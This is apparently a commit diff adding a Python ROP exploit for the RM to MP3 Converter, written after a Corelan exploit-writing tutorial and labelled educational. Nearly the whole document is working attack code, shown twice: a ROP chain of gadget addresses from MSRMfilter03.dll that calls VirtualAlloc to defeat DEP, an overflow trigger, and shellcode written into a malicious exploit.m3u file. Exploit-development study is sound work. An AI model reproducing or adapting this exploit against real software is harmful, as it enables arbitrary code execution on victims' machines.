k3170makan · March 18, 2015 02:03
diff --git a/RM2MP3CoverterROPExploit.py b/RM2MP3CoverterROPExploit.py
 from sys import argv
 import struct
 """
 	ROP Exploit for RM converter example from Corelans blog, written here for educational purposes
 	Tested on: Windows 7 32bit Ultimate
 	
 	author: Keith (k3170) Makan

 	Refs: 
 		http://www.fuzzysecurity.com/tutorials/expDev/7.html
 		https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
 		
 Basic PUSHAD strategy 
 EAX = ptr to &VirtualAlloc()
 ECX = flProtect (0x40) DONE
 EDX = flAllocationType (0x1000) 
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 """
 def prepFlProtect():
 	#kills EAX
 	#ECX holds 0x40
    rop_gadgets = [
      0x1002b93e,# POP EAX # RETN
 	  0xfbdbbc15,# set eax to something
 	  0x1002ba24,# ADD EAX,424442B # RETN
 	  0x10024e95 # PUSH EAX # PUSH SS # ADD AL,10 # POP ECX # POP ECX # RETN
 	  #0x10013f25 # PUSH EAX # RETN
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 def prepflAllocationType():
 	rop_gadgets = [
      0x1002b93e,# POP EAX # RETN
 	  0xfbdbcbd7,# (set eax to something added 2 for 2 0xff's add later on)
 	  0x1002ba24,# ADD EAX,424442B # RETN  (EAX has 1000 in it)
 	  0x10024e95,# PUSH EAX # PUSH SS # ADD AL,10 # POP ECX # POP ECX # RETN (ecx has value)
 	  0x10024ed0,# POP EBX # RETN 0x10 (clear EBX value )
 	  0xffffffff,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x10028865,# ADD EBX,ECX # SUB AL,24 # POP EDX # RETN (clear edx, switch  ECX and EBX, ebx has value)
 	  0xffffffff,# (buff value)
 	  0x10024ece,# ADD EDX,EBX # POP EBX # RETN 0x10 (swap EBX, EDX edx has value -1)
 	  0xffffffff,# (buff value pop ebx)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  0x100308bf,# (buff value)
 	  #0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection) or some reason EDX seems to pick up whatever the last value on the stack was
 	  #0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection)
    ]
 	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 def prepDwSize():
 	#kills EAX
 	#EBX holds 320 = 800 bytes
    rop_gadgets = [
 	  0x1002b93e,# POP EAX # RETN
 	  0xfbdbbef6,# (set eax to something added 2 for 2 0xff's add later on)
 	  0x1002ba24,# ADD EAX,424442B # RETN  (EAX has 1000 in it)
 	  0x1001bdee,# PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
      0x41414141,# Filler (compensate)
      0x41414141 # Filler (compensate)
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 def prepVirtualAllocPTR():
    rop_gadgets = [
      0x1002d8d2,# POP EAX # RETN [MSRMfilter03.dll] 
 	  0x10032078,# ptr to virtual alloc
 	  0x1002588C # PUSH EAX # ADD DWORD PTR SS:[EBP+5],ESI # PUSH 1 # POP EAX # POP ESI # RETN 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 def prepEDI():
    rop_gadgets = [
      0x10023e98,# POP EDI # RETN [MSRMfilter03.dll] 
      0x1001c121,# RETN (ROP NOP) [MSRMfilter03.dll]
 	  #0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection)
 	  
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 def prepEAX():
    rop_gadgets = [
 	  0x1002b93e,# POP EAX # RETN
      0x90909090,# (NOP) [MSRMfilter03.dll]
 	  0x10010e05,# PUSHAD
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 	
 if __name__ == "__main__":

 	ovTrigger = 26078
 	f = open("exploit.m3u","w")
 	trigger  = "A"*(ovTrigger)
 	rop = "\x99\x3E\x02\x10" #10023E99 RETN
 	rop += "A"*4
 	rop += prepflAllocationType()
 	rop += prepFlProtect()
 	rop += prepDwSize()
 	rop += prepVirtualAllocPTR()
 	rop += prepEDI()
 	rop += prepEAX()
 	shellcode = calc = ( #stole some shellcode and tips from http://www.fuzzysecurity.com/tutorials/expDev/7.html 
 	"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
 	"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
 	"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
 	"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
 	"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
 	"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
 	print '\\x'.join(hex(ord(c))[2:]for c in rop)
 	payload = trigger + rop + shellcode
 	f.write(payload)
 	f.flush()
 	f.close()
	from sys import argv
	import struct
	"""
	ROP Exploit for RM converter example from Corelans blog, written here for educational purposes
	Tested on: Windows 7 32bit Ultimate

	author: Keith (k3170) Makan

	Refs:
	http://www.fuzzysecurity.com/tutorials/expDev/7.html
	https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/

	Basic PUSHAD strategy
	EAX = ptr to &VirtualAlloc()
	ECX = flProtect (0x40) DONE
	EDX = flAllocationType (0x1000)
	EBX = dwSize
	ESP = lpAddress (automatic)
	EBP = POP (skip 4 bytes)
	ESI = ptr to JMP [EAX]
	EDI = ROP NOP (RETN)
	"""
	def prepFlProtect():
	#kills EAX
	#ECX holds 0x40
	rop_gadgets = [
	0x1002b93e,# POP EAX # RETN
	0xfbdbbc15,# set eax to something
	0x1002ba24,# ADD EAX,424442B # RETN
	0x10024e95 # PUSH EAX # PUSH SS # ADD AL,10 # POP ECX # POP ECX # RETN
	#0x10013f25 # PUSH EAX # RETN
	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
	def prepflAllocationType():
	rop_gadgets = [
	0x1002b93e,# POP EAX # RETN
	0xfbdbcbd7,# (set eax to something added 2 for 2 0xff's add later on)
	0x1002ba24,# ADD EAX,424442B # RETN (EAX has 1000 in it)
	0x10024e95,# PUSH EAX # PUSH SS # ADD AL,10 # POP ECX # POP ECX # RETN (ecx has value)
	0x10024ed0,# POP EBX # RETN 0x10 (clear EBX value )
	0xffffffff,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x10028865,# ADD EBX,ECX # SUB AL,24 # POP EDX # RETN (clear edx, switch ECX and EBX, ebx has value)
	0xffffffff,# (buff value)
	0x10024ece,# ADD EDX,EBX # POP EBX # RETN 0x10 (swap EBX, EDX edx has value -1)
	0xffffffff,# (buff value pop ebx)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	0x100308bf,# (buff value)
	#0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection) or some reason EDX seems to pick up whatever the last value on the stack was
	#0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection)
	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
	def prepDwSize():
	#kills EAX
	#EBX holds 320 = 800 bytes
	rop_gadgets = [
	0x1002b93e,# POP EAX # RETN
	0xfbdbbef6,# (set eax to something added 2 for 2 0xff's add later on)
	0x1002ba24,# ADD EAX,424442B # RETN (EAX has 1000 in it)
	0x1001bdee,# PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
	0x41414141,# Filler (compensate)
	0x41414141 # Filler (compensate)
	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
	def prepVirtualAllocPTR():
	rop_gadgets = [
	0x1002d8d2,# POP EAX # RETN [MSRMfilter03.dll]
	0x10032078,# ptr to virtual alloc
	0x1002588C # PUSH EAX # ADD DWORD PTR SS:[EBP+5],ESI # PUSH 1 # POP EAX # POP ESI # RETN
	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
	def prepEDI():
	rop_gadgets = [
	0x10023e98,# POP EDI # RETN [MSRMfilter03.dll]
	0x1001c121,# RETN (ROP NOP) [MSRMfilter03.dll]
	#0x10013f25 # PUSH EAX # RETN (check if EDX has trigger value, this push breaks execution for inspection)

	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
	def prepEAX():
	rop_gadgets = [
	0x1002b93e,# POP EAX # RETN
	0x90909090,# (NOP) [MSRMfilter03.dll]
	0x10010e05,# PUSHAD
	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

	if __name__ == "__main__":

	ovTrigger = 26078
	f = open("exploit.m3u","w")
	trigger = "A"*(ovTrigger)
	rop = "\x99\x3E\x02\x10" #10023E99 RETN
	rop += "A"*4
	rop += prepflAllocationType()
	rop += prepFlProtect()
	rop += prepDwSize()
	rop += prepVirtualAllocPTR()
	rop += prepEDI()
	rop += prepEAX()
	shellcode = calc = ( #stole some shellcode and tips from http://www.fuzzysecurity.com/tutorials/expDev/7.html
	"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
	"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
	"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
	"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
	"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
	"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
	print '\\x'.join(hex(ord(c))[2:]for c in rop)
	payload = trigger + rop + shellcode
	f.write(payload)
	f.flush()
	f.close()